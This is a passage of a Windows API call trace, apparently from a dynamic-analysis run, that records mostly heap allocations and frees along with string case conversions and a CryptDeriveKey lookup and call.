(in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0207.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0207.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0207.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0207.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0207.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0207.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0207.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0207.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0207.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0207.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0207.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0207.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0207.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0207.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0207.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0207.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0207.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0207.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0207.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0207.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0207.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0207.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0207.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0207.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0207.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0207.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0207.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3020 | out: hHeap=0x25c0000) returned 1 [0207.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x24b3020 [0207.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2e00 | out: hHeap=0x25c0000) returned 1 [0207.722] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0207.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0207.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0207.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0207.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0207.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0207.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0207.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0207.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0207.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0207.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0207.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0207.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0207.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0207.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0207.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0207.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0207.723] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0207.723] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0207.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0207.723] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0207.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0207.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0207.723] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0207.724] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0207.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0207.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0207.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0207.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0207.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0207.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0207.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0207.724] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0207.724] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0207.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0207.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0207.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0207.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0207.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0207.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0207.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0207.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0207.725] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0207.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0207.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0207.725] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0207.725] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0207.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0207.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0207.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0207.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0207.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0207.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0207.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0207.726] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0207.726] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0207.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0207.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0207.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0207.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0207.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0207.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0207.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0207.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0207.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0207.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0207.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0207.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0207.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.727] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0207.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0207.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0207.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0207.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0207.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0207.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0207.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0207.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0207.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0207.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0207.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0207.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0207.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0207.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0207.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0207.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0207.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0207.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0207.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0207.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0207.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0207.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0207.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0207.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0207.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0207.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0207.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x34aa2f8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0207.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0207.729] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDeriveKey") returned 0x74d83188 [0207.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0207.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0207.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0207.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0207.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0207.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0207.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0207.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0207.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0207.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0207.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0207.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0207.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0207.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0207.730] CryptDeriveKey (in: hProv=0xad2940, Algid=0x6601, hBaseData=0xaa5760, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5860) returned 1 [0207.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x24b2e00 [0207.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0207.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0207.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0207.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0207.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0207.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0207.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0207.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0207.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0207.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0207.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0207.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0207.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0207.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0207.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0207.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0207.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0207.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0207.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0207.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0207.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0207.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0207.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0207.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0207.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0207.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0207.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0207.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0207.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0207.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0207.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0207.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0207.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0207.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0207.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0207.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0207.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0207.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0207.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0207.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0207.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0207.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0207.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0207.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0207.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0207.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0207.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0207.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0207.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0207.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 